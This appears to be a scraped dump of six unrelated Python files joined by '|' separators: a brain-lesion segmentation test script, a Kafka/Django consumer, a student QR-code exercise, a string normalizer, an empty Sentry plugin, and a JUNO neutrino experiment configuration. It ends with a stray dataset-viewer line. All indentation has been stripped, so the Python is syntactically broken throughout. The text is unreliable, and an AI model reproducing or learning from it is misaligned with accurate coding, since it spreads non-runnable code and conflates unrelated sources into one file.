tf.flags.DEFINE_string('gpu_index', '0', 'gpu index, default: 0')
tf.flags.DEFINE_integer('batch_size', 1, 'batch size, default: 1')
tf.flags.DEFINE_bool('is_test', True, 'default: False (train)')#False True
tf.flags.DEFINE_string('dataset', 'Hemorrhage', 'dataset name [Hemorrhage|Infarct], default: Infarct')
tf.flags.DEFINE_float('learning_rate', 2e-4, 'initial learning rate for Adam, default: 2e-4')
tf.flags.DEFINE_float('beta1', 0.5, 'momentum term of adam, default: 0.5')
tf.flags.DEFINE_integer('iters', 20000, 'number of iteratons, default: 50000')
tf.flags.DEFINE_integer('print_freq', 100, 'print frequency, default: 100')
tf.flags.DEFINE_integer('eval_freq', 500, 'evaluation frequency, default: 500')
tf.flags.DEFINE_integer('sample_freq', 200, 'sample frequency, default: 200')
tf.flags.DEFINE_string('checkpoint_dir', './checkpoints', 'models are saved here')
tf.flags.DEFINE_string('sample_dir', './sample', 'sample are saved here')
tf.flags.DEFINE_string('test_dir', './test', 'test images are saved here')
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu_index
im_root = '../testdata/'
lst = os.listdir(im_root)
idname = lst #lst[1:]
N = len(idname)
nx = 512
ny = 512
for ind in range (0,N):#(10,N):
# load GT
niiname = im_root + idname[ind] + '/lesionGT.nii.gz'
if os.path.exists(niiname) is False:
continue
gt_sub = nib.load(niiname)
gt_data = gt_sub.get_data()
nx0 = gt_data.shape[0]
ny0 = gt_data.shape[1]
if nx0 != nx | ny0 != ny:
continue
gt_data = gt_sub.get_data()
gt = np.float32(gt_data)
# load cropped norm 0-1 img
niiname = im_root + idname[ind] + '/ncct_brainRZNorm.nii.gz'
img_sub = nib.load(niiname)
img = img_sub.get_data()
# load difference med7
niiname = im_root + idname[ind] + '/DifMed7.nii.gz'
img_sub = nib.load(niiname)
dif7 = img_sub.get_data()
hdrimg = img_sub.header
img_affine = img_sub.affine
# load mask
niiname = im_root + idname[ind] + '/brain_mask.nii.gz'
img_sub = nib.load(niiname)
mask = img_sub.get_data()
mask_size_z = np.sum(np.sum(mask, axis=0), axis=0)
ind0 = np.where(mask_size_z < 1000)
# load distance
niiname = im_root + idname[ind] + '/dist.nii.gz'
img_sub = nib.load(niiname)
dist = img_sub.get_data()
# load location prob
niiname = im_root + idname[ind] + '/locprob.nii.gz'
img_sub = nib.load(niiname)
loc = img_sub.get_data()
img = np.transpose(img, [2, 0, 1])
dif7 = np.transpose(dif7, [2, 0, 1])
mask = np.transpose(mask, [2, 0, 1])
gt = np.transpose(gt, [2, 0, 1])
dist = np.transpose(dist, [2, 0, 1])
loc = np.transpose(loc, [2, 0, 1])
img = np.multiply(img, mask)
dif7 = np.multiply(dif7, mask)
gt = np.multiply(gt, mask)
loc = np.multiply(loc, mask)
dist = np.multiply(dist, mask)
gt[gt <= 0] = 0
gt[gt > 0] = 1
nz_all = img.shape[0]
ny_all = img.shape[1]
nx_all = img.shape[2]
X_data = np.zeros((nz_all, ny_all, nx_all, 4), dtype=np.float32)
X_data[:, :, :, 0] = img
X_data[:, :, :, 1] = dif7
X_data[:, :, :, 2] = dist
X_data[:, :, :, 3] = loc
solver = Solver(FLAGS)
prob = solver.test(X_data,gt,mask,ind)
# do not detect slices with certain size
mask[ind0[0], :, :] = 0
prob = np.multiply(prob, mask)
prob = np.transpose(prob, [1, 2, 0])
prob = (prob - np.amin(prob))/(np.amax(prob) - np.amin(prob))
probpath = './MPCGAN_Res_' + FLAGS.dataset + '/' + idname[ind]
flag = os.path.exists(probpath)
if flag == 0:
os.makedirs(probpath)
savename = probpath + '/' + idname[ind] + '_probmap_MPCGAN.nii.gz'
affine = img_affine # np.diag([1, 2, 3, 1])
array_img = nib.Nifti1Image(prob, affine)
nib.save(array_img, savename)
print(idname[ind])
print('complete !!')
del prob, savename, array_img, gt_sub, gt, mask,X_data
gc.collect()
|
import os
import sys
from threading import Thread, currentThread
import json
from kafka import KafkaConsumer
import django
def consumer(canonical_source):
from Sync.models import CanonicalUpdate, ENUM_UpdateStatus
consumer = KafkaConsumer(canonical_source.name,
bootstrap_servers=['localhost:9092'])
print( f"Subscribed to { canonical_source.name }" )
done = False
current_thread = currentThread()
while not getattr(current_thread, "done", False):
message = next(consumer)
print ("%s:%d:%d: key=%s value=%s" % ( message.topic, message.partition,
message.offset, message.key,
message.value.decode('utf-8')))
update = CanonicalUpdate(canonical_source=canonical_source, status=ENUM_UpdateStatus.IN_PROGRESS, json=json.loads(message.value))
update.save()
def setup():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'kitchen_sync.settings')
django.setup()
def main():
from Sync.models import CanonicalSource
sources = CanonicalSource.objects.all()
threads = []
done = False
for source in sources:
thread = Thread(target=consumer, args=(source,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
setup()
main()
|
"""
Автор: Моисеенко Павел, подгруппа № 2.
ИСР 4.2. Задание: разработать фрагмент программы с использованием
библиотеки pyqrcode, позволяющей создавать изображение QR-кода на
основе переданной в программу текстовой строки.
"""
import pyqrcode
image = pyqrcode.create(input("Введите текст: "))
image.svg("qr.svg")
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
def normalize(value):
"""Returns the string with decimal separators normalized."""
return value.replace(',', '.')
|
from __future__ import absolute_import
from sentry.plugins import Plugin2
class GemstoneYetAnotherPlugin(Plugin2):
pass
|
from gna.exp import baseexp
from gna.configurator import uncertaindict, uncertain, NestedDict
from gna import constructors as C
from gna.expression.index import NIndex
import numpy as np
from load import ROOT as R
seconds_per_day = 60*60*24
class exp(baseexp):
"""
JUNO experiment implementation v01 (frozen)
Derived [2019.12] from:
- Daya Bay model from dybOscar and GNA
- juno_chengyp
Changes since previous implementation [juno_chengyp]:
- Dropped Enu-mode support
- Add matter oscillations
Implements:
- Reactor antineutrino flux:
* Spectra:
+ ILL+Vogel (now default)
+ Huber+Mueller
* [optional] Off-equilibrium corrections (Mueller)
* NO SNF contribution
- Vacuum 3nu oscillations
- Evis mode with 2d integration (similary to dybOscar)
- Final binning:
* 20 keV
* 10 keV (default)
- [optional] Birks-Cherenkov detector energy responce (Yaping)
- [optional] Detector energy resolution
- [optional] Multi-detector energy resolution (Yaping)
* subdetectors summed togather
* subdetectors concatenated
Misc changes:
- Switch oscillation probability bundle from v03 to v04 (OscProb3 class)
- Switch to double angle parameters for theta12 and theta13
- Added concatenated subdetectors
- Uncomment uncertainties:
* energy per fission
* fission fractions
"""
detectorname = 'AD1'
@classmethod
def initparser(cls, parser, namespace):
parser.add_argument( '--dot', help='write graphviz output' )
parser.add_argument( '-s', '--show', action='store_true', help='show the figure' )
parser.add_argument( '-o', '--output', help='output figure name' )
parser.add_argument('-p', '--print', action='append', choices=['outputs', 'inputs'], default=[], help='things to print')
parser.add_argument('-v', '--verbose', action='count', default=0, help='verbosity level')
parser.add_argument('--stats', action='store_true', help='print stats')
# Energy model
parser.add_argument('--energy-model', nargs='*', choices=['lsnl', 'eres', 'multieres'], default=['lsnl', 'eres'], help='Energy model components')
parser.add_argument('--subdetectors-number', type=int, choices=(200, 5), help='Number of subdetectors (multieres mode)')
parser.add_argument('--multieres', default='sum', choices=['sum', 'concat'], help='How to treat subdetectors (multieres mode)')
parser.add_argument('--eres-b-relsigma', type=float, help='Energy resolution parameter (b) relative uncertainty')
eres = parser.add_mutually_exclusive_group()
eres.add_argument('--eres-sigma', type=float, help='Energy resolution at 1 MeV')
eres.add_argument('--eres-npe', type=float, default=1350.0, help='Average Npe at 1 MeV')
# binning
parser.add_argument('--estep', default=0.01, choices=[0.02, 0.01], type=float, help='Binning step')
# reactor flux
parser.add_argument('--reactors', choices=['single', 'near-equal', 'far-off', 'pessimistic', 'nohz', 'dayabay'], default=[], nargs='+', help='reactors options')
parser.add_argument('--flux', choices=['huber-mueller', 'ill-vogel'], default='ill-vogel', help='Antineutrino flux')
parser.add_argument('--offequilibrium-corr', action='store_true', help="Turn on offequilibrium correction to antineutrino spectra")
# osc prob
parser.add_argument('--oscprob', choices=['vacuum', 'matter'], default='vacuum', help='oscillation probability type')
# Parameters
parser.add_argument('--parameters', choices=['default', 'yb', 'yb_t13', 'yb_t13_t12', 'yb_t13_t12_dm12', 'global'], default='default', help='set of parameters to load')
parser.add_argument('--dm', default='ee', choices=('23', 'ee'), help='Δm² parameter to use')
parser.add_argument('--pdgyear', choices=[2016, 2018], default=2018, type=int, help='PDG version to read the oscillation parameters')
parser.add_argument('--spectrum-unc', choices=['initial', 'final', 'none'], default='none', help='type of the spectral uncertainty')
correlations = [ 'lsnl', 'subdetectors' ]
parser.add_argument('--correlation', nargs='*', default=correlations, choices=correlations, help='Enable correalations')
def init(self):
self.init_nidx()
self.init_formula()
self.init_configuration()
self.preinit_variables()
self.build()
self.parameters()
self.register()
self.autodump()
if self.opts.stats:
self.print_stats()
def init_nidx(self):
if self.opts.subdetectors_number:
self.subdetectors_names = ['subdet%03i'%i for i in range(self.opts.subdetectors_number)]
else:
self.subdetectors_names = ()
self.reactors = ['YJ1', 'YJ2', 'YJ3', 'YJ4', 'YJ5', 'YJ6', 'TS1', 'TS2', 'TS3', 'TS4', 'DYB', 'HZ']
if 'pessimistic' in self.opts.reactors:
self.reactors.remove('TS3')
self.reactors.remove('TS4')
if 'far-off' in self.opts.reactors:
self.reactors.remove('DYB')
self.reactors.remove('HZ')
if 'nohz' in self.opts.reactors:
self.reactors.remove('HZ')
if 'dayabay' in self.opts.reactors:
self.reactors=['DYB']
if 'single' in self.opts.reactors:
self.reactors=['YJ1']
self.nidx = [
('d', 'detector', [self.detectorname]),
['r', 'reactor', self.reactors],
['i', 'isotope', ['U235', 'U238', 'Pu239', 'Pu241']],
('c', 'component', ['comp0', 'comp12', 'comp13', 'comp23']),
('s', 'subdetector', self.subdetectors_names)
]
self.nidx = NIndex.fromlist(self.nidx)
def init_formula(self):
if 'eres' in self.opts.energy_model and 'multieres' in self.opts.energy_model:
raise Exception('Energy model options "eres" and "multieres" are mutually exclusive: use only one of them')
self.formula = list(self.formula_base)
oscprob_part = self.opts.oscprob=='vacuum' and self.formula_oscprob_vacuum or self.formula_oscprob_matter
offeq_correction = '*offeq_correction[i,r](enu())' if self.opts.offequilibrium_corr else ''
ibd = self.formula_ibd_noeffects.format(oscprob=oscprob_part, offeq_correction=offeq_correction)
self.formula = self.formula + self.formula_enu
energy_model_formula = ''
energy_model = self.opts.energy_model
concat_subdetectors=False
if 'lsnl' in energy_model:
energy_model_formula = 'lsnl| '
self.formula.append('evis_edges_hist| evis_hist')
if 'eres' in energy_model:
energy_model_formula = 'eres| '+energy_model_formula
self.formula.append('eres_matrix| evis_hist')
elif 'multieres' in energy_model:
if self.opts.multieres=='sum':
energy_model_formula = 'sum[s]| subdetector_fraction[s] * eres[s]| '+energy_model_formula
self.formula.append('eres_matrix[s]| evis_hist')
elif self.opts.multieres=='concat':
energy_model_formula = 'concat[s]| rebin| subdetector_fraction[s] * eres[s]| '+energy_model_formula
self.formula.append('eres_matrix[s]| evis_hist')
concat_subdetectors = True
if concat_subdetectors:
formula_back = 'observation=norm * ibd'
else:
formula_back = 'observation=norm * rebin(ibd)'
if self.opts.spectrum_unc=='initial':
ibd = ibd+'*shape_norm()'
elif self.opts.spectrum_unc=='final':
formula_back = formula_back+'*shape_norm()'
self.formula.append('ibd=' + energy_model_formula + ibd)
self.formula.append(formula_back)
def parameters(self):
ns = self.namespace
dmxx = 'pmns.DeltaMSq'+str(self.opts.dm).upper()
for par in [dmxx, 'pmns.SinSqDouble12', 'pmns.DeltaMSq12']:
ns[par].setFree()
def single2double(v):
return 4.0*v*(1.0-v)
if self.opts.parameters=='yb':
ns['pmns.SinSqDouble12'].setCentral(single2double(0.307))
ns['pmns.SinSqDouble13'].setCentral(single2double(0.024))
ns['pmns.DeltaMSq12'].setCentral(7.54e-5)
ns['pmns.DeltaMSqEE'].setCentral(2.43e-3)
ns['pmns.SinSqDouble12'].reset()
ns['pmns.SinSqDouble13'].reset()
ns['pmns.DeltaMSq12'].reset()
ns['pmns.DeltaMSqEE'].reset()
elif self.opts.parameters=='yb_t13':
ns['pmns.SinSqDouble12'].setCentral(single2double(0.307))
ns['pmns.DeltaMSq12'].setCentral(7.54e-5)
ns['pmns.DeltaMSqEE'].setCentral(2.43e-3)
ns['pmns.SinSqDouble12'].reset()
ns['pmns.DeltaMSq12'].reset()
ns['pmns.DeltaMSqEE'].reset()
elif self.opts.parameters=='yb_t13_t12_dm12':
ns['pmns.DeltaMSqEE'].setCentral(2.43e-3)
ns['pmns.DeltaMSqEE'].reset()
elif self.opts.parameters=='global':
ns['pmns.DeltaMSq12'].setCentral(7.39e-5)
ns['pmns.DeltaMSq12'].reset()
def init_configuration(self):
if self.opts.eres_npe:
self.opts.eres_sigma = self.opts.eres_npe**-0.5
else:
self.opts.eres_npe = self.opts.eres_sigma**-2
print('Energy resolution at 1 MeV: {}% ({} pe)'.format(self.opts.eres_sigma*100, self.opts.eres_npe))
self.cfg = NestedDict(
kinint2 = NestedDict(
bundle = dict(name='integral_2d1d', version='v03', names=dict(integral='kinint2')),
variables = ('evis', 'ctheta'),
edges = np.arange(0.0, 12.001, 0.01), #FIXME
# edges = np.linspace(0.0, 12.001, 601),
xorders = 4,
yorder = 5,
),
rebin = NestedDict(
bundle = dict(name='rebin', version='v03', major=''),
rounding = 3,
edges = np.concatenate( (
[0.7],
np.arange(1, 6.0, self.opts.estep),
np.arange(6, 7.0, 0.1),
[7.0, 7.5, 12.0]
)
),
name = 'rebin',
label = 'Final histogram {detector}'
),
ibd_xsec = NestedDict(
bundle = dict(name='xsec_ibd', version='v02'),
order = 1,
),
oscprob = NestedDict(
bundle = dict(name='oscprob', version='v04', major='rdc', inactive=self.opts.oscprob=='matter'),
pdgyear = self.opts.pdgyear,
dm = self.opts.dm
),
oscprob_matter = NestedDict(
bundle = dict(name='oscprob_matter', version='v01', major='rd', inactive=self.opts.oscprob=='vacuum',
names=dict(oscprob='oscprob_matter')),
density = 2.6, # g/cm3
pdgyear = self.opts.pdgyear,
dm = self.opts.dm
),
anuspec_hm = NestedDict(
bundle = dict(name='reactor_anu_spectra', version='v03', inactive=self.opts.flux!='huber-mueller'),
name = 'anuspec',
filename = ['data/reactor_anu_spectra/Huber/Huber_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat',
'data/reactor_anu_spectra/Mueller/Mueller_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat'],
# strategy = dict( underflow='constant', overflow='extrapolate' ),
edges = np.concatenate( ( np.arange( 1.8, 8.7, 0.025 ), [ 12.3 ] ) ),
),
anuspec_ill = NestedDict(
bundle = dict(name='reactor_anu_spectra', version='v03', inactive=self.opts.flux!='ill-vogel'),
name = 'anuspec',
filename = ['data/reactor_anu_spectra/ILL/ILL_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat',
'data/reactor_anu_spectra/Vogel/Vogel_smooth_extrap_{isotope}_13MeV0.01MeVbin.dat'],
# strategy = dict( underflow='constant', overflow='extrapolate' ),
edges = np.concatenate( ( np.arange( 1.8, 8.7, 0.025 ), [ 12.3 ] ) ),
),
offeq_correction = NestedDict(
bundle = dict(name='reactor_offeq_spectra',
version='v03', major='ir'),
offeq_data = 'data/reactor_anu_spectra/Mueller/offeq/mueller_offequilibrium_corr_{isotope}.dat',
),
eff = NestedDict(
bundle = dict(
name='parameters',
version='v01'),
parameter="eff",
label='Detection efficiency',
pars = uncertain(0.8, 'fixed')
),
global_norm = NestedDict(
bundle = dict(
name='parameters',
version='v01'),
parameter="global_norm",
label='Global normalization',
pars = uncertain(1, 'free'),
),
fission_fractions = NestedDict(
bundle = dict(name="parameters_yaml_v01", major = 'i'),
parameter = "fission_fractions",
label = 'Fission fraction of {isotope} in reactor {reactor}',
objectize=True,
data = 'data/data_juno/fission_fractions/2013.12.05_xubo.yaml'
),
livetime = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "livetime",
label = 'Livetime of {detector} in seconds',
pars = uncertaindict(
[('AD1', (6*365*seconds_per_day, 'fixed'))],
),
),
baselines = NestedDict(
bundle = dict(name='reactor_baselines', version='v01', major = 'rd'),
reactors = 'near-equal' in self.opts.reactors \
and 'data/juno_nominal/coordinates_reactors_equal.py' \
or 'data/juno_nominal/coordinates_reactors.py',
detectors = 'data/juno_nominal/coordinates_det.py',
unit = 'km'
),
norm = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "norm",
label = 'Reactor power/detection efficiency correlated normalization',
pars = uncertain(1.0, (2**2+1**2)**0.5, 'percent')
),
thermal_power = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "thermal_power",
label = 'Thermal power of {reactor} in GWt',
pars = uncertaindict([
('TS1', 4.6),
('TS2', 4.6),
('TS3', 4.6),
('TS4', 4.6),
('YJ1', 2.9),
('YJ2', 2.9),
('YJ3', 2.9),
('YJ4', 2.9),
('YJ5', 2.9),
('YJ6', 2.9),
('DYB', 17.4),
('HZ', 17.4),
],
uncertainty=0.8,
mode='percent'
),
),
target_protons = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "target_protons",
label = 'Number of protons in {detector}',
pars = uncertaindict(
[('AD1', (1.42e33, 'fixed'))],
),
),
conversion_factor = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter='conversion_factor',
label='Conversion factor from GWt to MeV',
#taken from transformations/neutrino/ReactorNorm.cc
pars = uncertain(R.NeutrinoUnits.reactorPowerConversion, 'fixed'),
),
eper_fission = NestedDict(
bundle = dict(name="parameters", version = "v01"),
parameter = "eper_fission",
label = 'Energy per fission for {isotope} in MeV',
pars = uncertaindict(
[
('U235', (201.92, 0.46)),
('U238', (205.52, 0.96)),
('Pu239', (209.99, 0.60)),
('Pu241', (213.60, 0.65))
],
mode='absolute'
),
),
lsnl = NestedDict(
bundle = dict( name='energy_nonlinearity_birks_cherenkov', version='v01', major=''),
stopping_power='data/data_juno/energy_model/2019_birks_cherenkov_v01/stoppingpower.txt',
annihilation_electrons=dict(
file='data/data_juno/energy_model/2019_birks_cherenkov_v01/hgamma2e.root',
histogram='hgamma2e_1KeV',
scale=1.0/50000 # events simulated
),
pars = uncertaindict(
[
('birks.Kb0', (1.0, 'fixed')),
('birks.Kb1', (15.2e-3, 0.1776)),
# ('birks.Kb2', (0.0, 'fixed')),
("cherenkov.E_0", (0.165, 'fixed')),
("cherenkov.p0", ( -7.26624e+00, 'fixed')),
("cherenkov.p1", ( 1.72463e+01, 'fixed')),
("cherenkov.p2", ( -2.18044e+01, 'fixed')),
("cherenkov.p3", ( 1.44731e+01, 'fixed')),
("cherenkov.p4", ( 3.22121e-02, 'fixed')),
("Npescint", (1341.38, 0.0059)),
("kC", (0.5, 0.4737)),
("normalizationEnergy", (11.99, 'fixed'))
],
mode='relative'
),
integration_order = 2,
correlations_pars = [ 'birks.Kb1', 'Npescint', 'kC' ],
correlations = [ 1.0, 0.94, -0.97,
0.94, 1.0, -0.985,
-0.97, -0.985, 1.0 ],
fill_matrix=True,
labels = dict(
normalizationEnergy = 'Conservative normalization point at 12 MeV'
),
),
shape_uncertainty = NestedDict(
unc = uncertain(1.0, 1.0, 'percent'),
nbins = 200 # number of bins, the uncertainty is defined to
)
)
if 'eres' in self.opts.energy_model:
bconf = self.opts.eres_b_relsigma and (self.opts.eres_b_relsigma, 'relative') or ('fixed',)
self.cfg.eres = NestedDict(
bundle = dict(name='detector_eres_normal', version='v01', major=''),
# pars: sigma_e/e = sqrt( a^2 + b^2/E + c^2/E^2 ),
parameter = 'eres',
pars = uncertaindict([
('a', (0.000, 'fixed')),
('b', (self.opts.eres_sigma,)+bconf),
('c', (0.000, 'fixed'))
]),
expose_matrix = False
)
elif 'multieres' in self.opts.energy_model:
if self.opts.subdetectors_number==200:
self.cfg.subdetector_fraction = NestedDict(
bundle = dict(name="parameters", version = "v02"),
parameter = "subdetector_fraction",
label = 'Subdetector fraction weight for {subdetector}',
pars = uncertaindict(
[(subdet_name, (1.0/self.opts.subdetectors_number, 0.04, 'relative')) for subdet_name in self.subdetectors_names],
),
correlations = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/corrmap_xuyu.txt'
)
self.cfg.multieres = NestedDict(
bundle = dict(name='detector_multieres_stats', version='v01', major='s'),
# pars: sigma_e/e = sqrt(b^2/E),
parameter = 'eres',
relsigma = self.opts.eres_b_relsigma,
nph = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/subdetector200_nph.txt',
rescale_nph = self.opts.eres_npe,
expose_matrix = False
)
elif self.opts.subdetectors_number==5:
self.cfg.subdetector_fraction = NestedDict(
bundle = dict(name="parameters", version = "v03"),
parameter = "subdetector_fraction",
label = 'Subdetector fraction weight for {subdetector}',
pars = uncertaindict(
[(subdet_name, (1.0/self.opts.subdetectors_number, 0.04, 'relative')) for subdet_name in self.subdetectors_names],
),
covariance = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/subdetector5_cov.txt'
)
self.cfg.multieres = NestedDict(
bundle = dict(name='detector_multieres_stats', version='v01', major='s'),
# pars: sigma_e/e = sqrt(b^2/E),
parameter = 'eres',
relsigma = self.opts.eres_b_relsigma,
nph = 'data/data_juno/energy_resolution/2019_subdetector_eres_n200_proper/subdetector5_nph.txt',
rescale_nph = self.opts.eres_npe,
expose_matrix = False
)
else:
assert False
if not 'lsnl' in self.opts.correlation:
self.cfg.lsnl.correlations = None
self.cfg.lsnl.correlations_pars = None
if not 'subdetectors' in self.opts.correlation:
self.cfg.subdetector_fraction.correlations = None
self.cfg.eff.pars = uncertain(0.73, 'fixed')
self.cfg.livetime.pars['AD1'] = uncertain( 6*330*seconds_per_day, 'fixed' )
def preinit_variables(self):
if self.opts.spectrum_unc in ['final', 'initial']:
spec = self.namespace('spectrum')
cfg = self.cfg.shape_uncertainty
unc = cfg.unc
if self.opts.spectrum_unc=='initial':
edges = self.cfg.kinint2.edges
elif self.opts.spectrum_unc=='final':
edges = self.cfg.rebin.edges
# bin-to-bin should take into account the number of bins it is applied to
unccorrection = ((edges.size-1.0)/cfg.nbins)**0.5
unc.uncertainty*=unccorrection
names = []
for bini in range(edges.size-1):
name = 'norm_bin_%04i'%bini
names.append(name)
label = 'Spectrum shape unc. final bin %i (%.03f, %.03f) MeV'%(bini, edges[bini], edges[bini+1])
spec.reqparameter(name, cfg=unc, label=label)
with spec:
vararray = C.VarArray(names, labels='Spectrum shape norm')
self.cfg.shape_uncertainty = NestedDict(
bundle = dict(name='predefined', version='v01'),
name = 'shape_norm',
inputs = None,
outputs = vararray.single(),
unc = cfg.unc,
object = vararray
)
elif self.opts.spectrum_unc=='none':
pass
else:
raise Exception('Unknown spectrum shape uncertainty type: '+self.opts.spectrum_unc)
def build(self):
from gna.expression.expression_v01 import Expression_v01, ExpressionContext_v01
from gna.bundle import execute_bundles
# Initialize the expression and indices
self.expression = Expression_v01(self.formula, self.nidx)
# Dump the information
if self.opts.verbose:
print(self.expression.expressions_raw)
print(self.expression.expressions)
# Parse the expression
self.expression.parse()
# The next step is needed to name all the intermediate variables.
self.expression.guessname(self.lib, save=True)
if self.opts.verbose>1:
print('Expression tree:')
self.expression.tree.dump(True)
print()
# Put the expression into context
self.context = ExpressionContext_v01(self.cfg, ns=self.namespace)
self.expression.build(self.context)
def autodump(self):
if self.opts.verbose>2:
width = 40
print('Outputs:')
print(self.context.outputs.__str__(nested=True, width=width))
print()
print('Inputs:')
print(self.context.inputs.__str__(nested=True, width=width))
print()
if self.opts.verbose or self.opts.stats:
print('Parameters:')
self.stats = dict()
correlations = self.opts.verbose>2 and 'full' or 'short'
self.namespace.printparameters(labels=True, stats=self.stats, correlations=correlations)
def register(self):
ns = self.namespace
outputs = self.context.outputs
# ns.addobservable("{0}_unoscillated".format(self.detectorname), outputs, export=False)
ns.addobservable("Enu", outputs.enu, export=False)
if 'ibd_noeffects_bf' in outputs:
ns.addobservable("{0}_noeffects".format(self.detectorname), outputs.ibd_noeffects_bf.AD1)
fine = outputs.ibd_noeffects_bf.AD1
else:
ns.addobservable("{0}_noeffects".format(self.detectorname), outputs.kinint2.AD1)
fine = outputs.kinint2.AD1
if 'lsnl' in self.opts.energy_model:
ns.addobservable("{0}_lsnl".format(self.detectorname), outputs.lsnl.AD1)
fine = outputs.lsnl.AD1
if 'eres' in self.opts.energy_model:
ns.addobservable("{0}_eres".format(self.detectorname), outputs.eres.AD1)
fine = outputs.eres.AD1
if 'multieres' in self.opts.energy_model:
if self.opts.multieres=='concat' and self.opts.subdetectors_number<10:
sns = ns('{}_sub'.format(self.detectorname))
for i, out in enumerate(outputs.rebin.AD1.values()):
sns.addobservable("sub{:02d}".format(i), out)
ns.addobservable("{0}_eres".format(self.detectorname), outputs.ibd.AD1)
fine = outputs.ibd.AD1
ns.addobservable("{0}_fine".format(self.detectorname), fine)
ns.addobservable("{0}".format(self.detectorname), outputs.observation.AD1)
def print_stats(self):
from gna.graph import GraphWalker, report, taint, taint_dummy
out=self.context.outputs.rebin.AD1
walker = GraphWalker(out)
report(out.data, fmt='Initial execution time: {total} s')
report(out.data, 100, pre=lambda: walker.entry_do(taint), pre_dummy=lambda: walker.entry_do(taint_dummy))
print('Statistics', walker.get_stats())
print('Parameter statistics', self.stats)
formula_enu = ['evis_hist=evis_hist()', 'enu| ee(evis()), ctheta()']
formula_base = [
'baseline[d,r]',
'livetime[d]',
'conversion_factor',
'numerator = eff * livetime[d] * thermal_power[r] * '
'fission_fractions[r,i]() * conversion_factor * target_protons[d] ',
'eper_fission_avg = sum[i] | eper_fission[i] * fission_fractions[r,i]()',
'power_livetime_factor = numerator / eper_fission_avg',
]
formula_ibd_noeffects = '''
kinint2(
sum[r]|
baselineweight[r,d]*
ibd_xsec(enu(), ctheta())*
jacobian(enu(), ee(), ctheta())*
expand(sum[i]|
power_livetime_factor*anuspec[i](enu()){offeq_correction})*
{oscprob}
)
'''
formula_oscprob_vacuum = 'sum[c]| pmns[c]*oscprob[c,d,r](enu())'
formula_oscprob_matter = 'oscprob_matter[d,r](enu())'
lib = """
cspec_diff:
expr: 'anuspec*ibd_xsec*jacobian*oscprob'
label: 'anu count rate | {isotope}@{reactor}-\\>{detector} ({component})'
cspec_diff_reac_l:
expr: 'baselineweight*cspec_diff_reac'
cspec_diff_det_weighted:
expr: 'pmns*cspec_diff_det'
eres_weighted:
expr: 'subdetector_fraction*eres'
label: '{{Fractional observed spectrum {subdetector}|weight: {weight_label}}}'
ibd:
expr:
- 'eres'
- 'sum:c|eres_weighted'
label: 'Observed IBD spectrum | {detector}'
ibd_noeffects:
expr: 'kinint2'
label: 'Observed IBD spectrum (no effects) | {detector}'
ibd_noeffects_bf:
expr: 'kinint2*shape_norm'
label: 'Observed IBD spectrum (best fit, no effects) | {detector}'
oscprob_weighted:
expr: 'oscprob*pmns'
oscprob_full:
expr: 'sum:c|oscprob_weighted'
label: 'anue survival probability | weight: {weight_label}'
fission_fractions:
expr: 'fission_fractions[r,i]()'
label: "Fission fraction for {isotope} at {reactor}"
eper_fission_weight:
expr: 'eper_fission_weight'
label: "Weighted eper_fission for {isotope} at {reactor}"
eper_fission_weighted:
expr: 'eper_fission*fission_fractions'
label: "{{Energy per fission for {isotope} | weighted with fission fraction at {reactor}}}"
eper_fission_avg:
expr: 'eper_fission_avg'
label: 'Average energy per fission at {reactor}'
power_livetime_factor:
expr: 'power_livetime_factor'
label: '{{Power-livetime factor (~nu/s)|{reactor}.{isotope}-\\>{detector}}}'
numerator:
expr: 'numerator'
label: '{{Power-livetime factor (~MW)|{reactor}.{isotope}-\\>{detector}}}'
power_livetime_scale:
expr: 'eff*livetime*thermal_power*conversion_factor*target_protons'
label: '{{Power-livetime factor (~MW)| {reactor}.{isotope}-\\>{detector}}}'
anuspec_weighted:
expr: 'anuspec*power_livetime_factor'
label: '{{Antineutrino spectrum|{reactor}.{isotope}-\\>{detector}}}'
anuspec_rd:
expr: 'sum:i|anuspec_weighted'
label: '{{Antineutrino spectrum|{reactor}-\\>{detector}}}'
countrate_rd:
expr:
- 'anuspec_rd*ibd_xsec*jacobian*oscprob_full'
- 'anuspec_rd*ibd_xsec*oscprob_full'
label: 'Countrate {reactor}-\\>{detector}'
countrate_weighted:
expr: 'baselineweight*countrate_rd'
countrate:
expr: 'sum:r|countrate_weighted'
label: '{{Count rate at {detector}|weight: {weight_label}}}'
observation_raw:
expr: 'bkg+ibd'
label: 'Observed spectrum | {detector}'
iso_spectrum_w:
expr: 'kinint2*power_livetime_factor'
reac_spectrum:
expr: 'sum:i|iso_spectrum_w'
reac_spectrum_w:
expr: 'baselineweight*reac_spectrum'
ad_spectrum_c:
expr: 'sum:r|reac_spectrum_w'
ad_spectrum_cw:
expr: 'pmns*ad_spectrum_c'
ad_spectrum_w:
expr: 'sum:c|ad_spectrum_cw'
eres_cw:
expr: 'eres*pmns'
"""
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.